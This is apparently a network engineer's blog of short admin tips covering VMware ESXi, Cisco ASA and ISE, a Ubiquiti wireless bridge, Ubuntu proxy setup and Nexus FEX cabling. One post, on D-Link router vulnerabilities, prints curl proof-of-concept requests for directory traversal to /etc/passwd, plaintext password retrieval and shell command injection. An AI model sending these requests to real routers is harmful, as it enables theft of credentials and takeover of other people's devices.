The Insecure Wire

a network engineers perspective

VMware ESXi Setting iphash load balancing via CLI

I recently setup x2 new ESXi 6.7u1 servers without access to each hosts LAN. I needed to configure the correct vSwitch failover setting so that the port channel uplinks would work correctly:

1. Enable SSH console from the management settings > troubleshooting options on the ESXi console.
2. Bring up the CLI console with alt + f1.
3. Enter the following commands to set the vSwitch and Management portgroup failover policy:

esxcli network vswitch standard policy failover set -v vSwitch0 -l iphash
esxcli network vswitch standard portgroup policy failover set -l iphash -p 'Management Network'

4. alt + f2 will switch you back to the vMware DCUI console.

Cisco ASA Dynamically open MS-RPC Ports

OK so this one is simple once you know how. TCP Port 135 (MS Remote Procedure Call Endpoint Mapper) requests high range ports > 1024 for Windows client / server networking. To allow this traffic across the ASA you need to pinhole the ports with the global policy map:

policy-map type inspect dcerpc dcerpc_map
timeout pinhole 0:10:00
class-map dcerpc
match port tcp eq 135

policy-map global_policy
class dcerpc
inspect dcerpc dcerpc_map

As well as permitting the traffic through the firewall rule (obviously). It can be done with tcp/135 or an IP any between hosts. Use the command:
show run policy map to verify the policy map.

Cisco ASA show CLI passwords

What’s the command so that you can see hashed passwords on the Cisco ASA CLI?

ciscoasa(config)# more system:running-config

Very handy for when you need to copy passwords from one device to the other.

Cisco ISE Unable to load Context Visibility page. Ensure that reverse DNS lookup is configured for all Cisco ISE nodes in your distributed deployment in the DNS server(s)

What a mouthful! So I was changing roles and deployment on our Cisco ISE back end yesterday ( when I ran into an interesting visual error on the primary administration node:


Turns out in your DNS server the reverse lookup has to match the hostname (A Records) of the ISE node(s). So my issue was that i had two zones and the ISE names and the elasticsearch component of ISE was picking up the non primary zone during a reverse DNS lookup. I removed those records and the error disappears and the correct data shows in the work center view.

The command I used to troubleshoot from the primary administration node shell was:

show application logging ise-elasticsearch.log

The dead give away was in the log file:

[2018-11-14 01:00:12,976][INFO ][discovery.zen ] [ibra] failed to send join request to master [{ithaca}{ROGHmWtxSv6JWzhjW3maeQ}{}{}], reason [NodeDisconnectedException[[
ithaca][][internal:discovery/zen/join] disconnected]]
[2018-11-14 01:00:16,077][WARN ][plugin.ssl.transport ] [ibra] exception caught on transport layer [[id: 0x7ce0f56d, / =>]], closing connection

Using Ubiquiti AirMax with Cisco dot1q Trunking

We recently encountered an issue wherein a particular training building required network access. It was actually a shed used to teach carpentry and bricklaying etc.
As this building never had fiber optic or conduit connected to it, a cost effective solution was sought after.

I decided to use Ubiquiti Networks AirMAX Prism 2 product. I was able to create a “virtual wire” from the existing Cisco Catalyst based campus network to the shed using the AirMAX Prism 2 product.
The really cool thing about UBNT gear is that is supports enterprise standards and in this case that is dot1q trunking and layer 2 protocols like CDP. Our link is only around 25 meters in distance so speed was not really going to be a problem as the Prism 2 product is 802.11AC capable at 20/40/80 Mhz channel widths. I was more interested in stability of the link over speed. Granted we were able to achieve 300 mbit – which is a good result for the staff and students working in this area.

Lets break down the components I used:
2 x UBNT Airmax Prism 2 AC radios – both come with GPS for plotting distance. Note these come with POE injectors.
2 x Ubiquiti 5GHz AC RocketDish, 31dBi (compatible with Prism 2 radios).
1 x 8 port POE managed ethernet switch POE
1 x Cisco 3702i AC wireless AP.

As shed never had any data cabling we decided to install our enterprise Cisco AP to provide network access to the building. This is why I didn’t bother with a 48 port Catalyst switch – a cheap POE switch from will do the trick. The Prism AC configuration is AP for main and station for shed side – this allows pass through of VLAN tags for dot1q trunking. Cisco AP on far end needs a specific native VLAN as it is running in flexconnect mode. managed switch supports dot1q and powers Cisco APs out of the box with out injector, you can also tag your inband mgmt vlan for the switch managed IP address.

So for around sub 3k with cabling / mounting costs we were able to extend the network to this location. Below is the Catalyst commands that uplink to the Prism2 in AP mode:
description Link to Radio Bridge
switchport trunk allowed vlan 2,3,4,10,111
switchport trunk encapsulation dot1q
switchport trunk native vlan 111
switchport mode trunk

A cool feature on the AirMAX OS for Prism is the Google maps integration if you mount the included GPS antenna on each end of the link. Below is a screen shot of the web interface that shows this mode:


UBNT AirOS GPS Feature

Multiple vulnerabilities in D-Link Routers

Released on Friday 12/10/18:

Multiple vulnerabilities in D-Link routers

Directory Traversal in httpd server in several series of D-Link
$ curl http://routerip/uir//etc/passwd
Password stored in plaintext in several series of D-Link routers:
$ curl http://routerip/uir//tmp/XXX/0
Shell command injection in httpd server of a several series of D-Link
$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20

Cannot extend datastore through vCenter Server

Today on the random VMware “feature” list – extended a datastore. So on the EMC SAN side the LUN was increased and vSphere client (vCenter) could see the extended drive. However you could not extended the datastore via the wizard.

Very interesting – quick google yeilded;
Cannot extend datastore through vCenter Server
So basically vCenter applies a filter when pulling available extents based on criteria:

1. LUNS are not used as datastores on that host or on any other host.
2. LUNS are not used as Raw Device Mappings on that host or any other host.

Solution – connect to the host directly that has the LUN and add the extend with the extend datastore wizard.

Adding system wide proxy to Ubuntu 18.04 Sever

Here’s how to do it:

Log into the CLI of your Ubuntu 18.04 server.
sudo su
sudo nano /etc/environment

Now add in your proxy variables in the following format:


Disconnect from CLI and login again for /etc/environment to take affect.

Cisco ISE Invalid MAC Address

If the incorrect format is used to import a MAC address (Cisco ISE you can’t delete it from the endpoint identity group screen (Administration > Groups > Endpoint Identity Groups. Error is as follows:

Cisco ISE Invalid MAC

To work around this remove the incorrectly formatted MAC address from:

Work Centers > Network Access > Identities. Use the search box and trash icon to clear the mac.

Multihoming Cisco 2K FEX with 5K Fabric

Recently we moved our data centre which is a Cisco UCS and Nexus Fabric design. After a very long day moving gear and reconnecting it all back up we couldn’t understand why one of our FEX’s kept flapping from the 5K fabric. The 5K fabric is multi homed to 2 FEX switches each in its on virtual port channel. We researched the issue and found that if your doing multi homing to more than one FEX switch you need to make sure the physical interface IDs on the 5K marry up.

For example:

5K-1 Port e1/29 (vpc101) -> 2K-1 Uplink Port 1
5K-2 Port e1/30 (vpc102) -> 2K-2 Uplink Port 1
5K-1 Port e1/29 (vpc101) -> 2K-1 Uplink Port 2
5K-2 Port e1/30 (vpc102) -> 2K-2 Uplink Port 2

As you can see above the 5K side is the same port number on each 5K connecting to a FEX. This fixed the flapping issue and ownership console error. Good times ensued and we could patch all our physical copper rack servers.